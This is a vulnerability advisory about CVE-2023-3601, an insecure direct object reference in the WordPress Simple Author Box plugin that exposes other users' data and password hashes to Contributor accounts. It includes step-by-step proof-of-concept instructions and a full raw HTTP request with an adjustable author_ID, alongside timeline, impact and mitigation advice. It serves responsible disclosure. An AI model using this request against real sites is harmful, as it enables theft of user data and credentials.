We have discovered a severe security vulnerability in the Simple Author Box plugin (CVE-2023-3601), which puts your WordPress accounts at high risk of being compromised. This vulnerability allows attackers with Contributor-level access or higher to steal sensitive user information, including hashed passwords.
Main info:
CVE | CVE-2023-3601 |
Plugin | Simple Author Box |
Critical | Very High |
Publicly Published | July 24, 2023 |
Last Updated | July 24, 2023 |
Researcher | Dmtirii Ignatyev |
OWASP TOP-10 | A01:2021-Broken Access Control |
PoC | Yes |
Exploit | Will be later |
Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3601 https://wpscan.com/vulnerability/c0cc513e-c306-4920-9afb-e33d95a7292f |
Plugin Security Certification by CleanTalk |
Timeline
July 5, 2023 | Plugin testing and vulnerability detection in the Simple Author Box plugin have been completed |
July 6, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
July 16, 2023 | The author has eliminated the vulnerability and patched his plugin |
July 24, 2023 | Registered CVE |
Discovery of the Vulnerability
During a thorough security assessment, I identified a critical security flaw in the Simple Author Box plugin for WordPress (CVE-2023-3601) , specifically affecting versions up to and including 2.51. This vulnerability arises from an Insecure Direct Object Reference (IDOR) issue within the plugin’s code. The plugin fails to properly validate user input when handling requests (action=sab_get_author) to fetch information about specific users, leading to the unauthorized disclosure of sensitive user details.
Understanding Insecure Direct Object Reference (IDOR)
Insecure Direct Object Reference is a type of security vulnerability where an application exposes direct references to internal objects, such as files, database records, or resources, without proper access controls. Attackers can manipulate these exposed references (often through changing parameters or input values) to access unauthorized data or functionalities.
Exploiting the IDOR Vulnerability
In the context of the Simple Author Box vulnerability, the plugin does not adequately check whether a user is authorized to access specific user information before displaying it. By altering the user ID parameter in a request, an authenticated attacker with Contributor-level permissions or higher can access personal information of other users, including potentially sensitive data such as hashed passwords (CVE-2023-3601).
POC:
1. Create a new Post as a Contributor user.
2. Add the “Simple Author Box” block.
3. Intercept the request to `/wp-admin/admin-ajax.php` upon addition of the block. Change the `author_ID` parameter to an ID of a user of your choosing.
4. Inspect the response to see all of the information about that user, including the hashed password.
POC request:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: your_site_here
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://your_site_here/wordpress/wp-admin/post-new.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: http://your_site_here
Connection: close
Cookie: thc_time=1693728697; wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1692348426%7CFaI19J1rkJx6EeKHpIVBTdyfmoDfF0Q1s0mnqWNHRUy%7C144c7182810741c5eae1d56f1a732319616b45d658a97cb2467966f1a9fa19de; wp-settings-1=libraryContent%3Dbrowse%26siteorigin_panels_setting_tab%3Dwelcome%26hidetb%3D0; wp-settings-time-1=1691260835; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1692348426%7CFaI19J1rkJx6EeKHpIVBTdyfmoDfF0Q1s0mnqWNHRUy%7C65dd803dab6a195a6d2c2ff57c23361a622ab5130f1dd3da09ae9076153598ec
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-originaction=sab_get_author&author_ID={here_you_can_put_number_from_0_to_9999}&nonce=bc05e90fd7
Potential Risks and Real-World Impact
The IDOR vulnerability in the Simple Author Box plugin introduces severe risks to both website administrators and users. Some of the potential real-world impact includes:
- Unauthorized Data Exposure:
Attackers can view and collect sensitive user information, leading to privacy violations and potential misuse of user data. - Credential Compromise:
Disclosure of hashed passwords can enable attackers to launch offline attacks, attempting to crack passwords and potentially gain unauthorized access to user accounts. - Identity Impersonation:
The leaked information could facilitate identity theft or social engineering attacks, compromising the integrity of user accounts and potentially affecting the reputation of the website.
Recommendations for Improved Security
To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:
- Immediate Plugin Update:
The developers of Simple Author Box should release a patched version that addresses the IDOR vulnerability. Website administrators should promptly update to the latest secure version to prevent exploitation. - Security Best Practices:
Plugin developers should adhere to secure coding practices, including input validation, proper access controls, and sanitization of user data. - Regular Security Audits:
Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively. - User Privilege Restriction:
Implement strict access controls to ensure that users can only access information that they are authorized to view based on their roles and permissions. - User Awareness:
Educate website administrators and users about the risks of sharing sensitive information and the importance of strong, unique passwords.
By addressing the IDOR vulnerability in the Simple Author Box plugin and following these security recommendations, website owners can significantly reduce the likelihood of security breaches and protect the privacy and integrity of their users’ data.
Use CleanTalk solutions to improve the security of your website
Dmitrii ignatyev
If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.